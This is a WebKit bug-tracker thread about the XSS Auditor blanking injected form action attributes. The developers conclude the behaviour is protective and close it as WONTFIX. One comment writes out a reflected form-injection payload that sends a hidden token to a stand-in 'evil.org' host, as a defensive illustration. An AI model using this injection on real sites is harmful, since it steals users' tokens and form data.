Bug 72585

Summary: XSS Auditor : <form> action is blocked even if it is not a JavaScript URL
Product: WebKit Reporter: prakash.1729
Component: WebCore Misc.    Assignee: Nobody <webkit-unassigned>
Status: RESOLVED WONTFIX    
Severity: Normal CC: abarth, ap, dbates, tsepez
Priority: P2 Keywords: XSSAuditor
Version: 528+ (Nightly build)   
Hardware: Unspecified   
OS: Linux   

Description prakash.1729 2011-11-17 01:18:33 PST
I observed that when I try to inject a FORM, the "action" attribute is made empty even if it is not a JavaScript URL. So is this an exception?
Comment 1 Adam Barth 2011-11-17 01:27:09 PST
Yeah, we should only need to block JavaScript URLs.

(This is a false positive, so not a security bug.)
Comment 2 prakash.1729 2011-11-17 02:23:25 PST
Though it is a false positive according to the design, it is in fact protecting against <form> injection, which is good. It is the same with <iframe> injection, where the src attribute is removed even if the src is not a JavaScript URL.

One more corner case is that an <iframe> from the same domain can be injected successfully. I assume this is a design decision.

P.S. I couldn't find an example in which detecting an injected form is a false positive.
Comment 3 Thomas Sepez 2012-02-27 10:36:21 PST
Looking at this old XSSAuditor bug, I think that blocking form actions to off-domain http locations when a <form> is injected is the right thing to do (i.e. we need to block more than just the javascript URLs as Adam suggests in Comment #1). Just so we're all on the same page, the case I'm considering (apologies if this is obvious) is when the page contains:

<form action="http://good.com">
  <input type="text" name="quantity" value="2">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">
</form>

and the "quantity" input element contains an injection, and we reflect from the URL say

   ...?quantity="></form><form action="http://evil.org">

resulting in page:

<form action="http://good.com">
  <input type="text" name="quantity" value=""></form><form action="http://evil.org">
  <input type="hidden" name="formkey" value="91812727123812">
  <input type="submit">
</form>

So when the user hits submit, we steal his formkey token (or other information from input fields).

Please re-open if you disagree, or if you find that this is being triggered in the absence of both a reflected "<form" tag and a reflected "action" attribute.

Thanks heaps.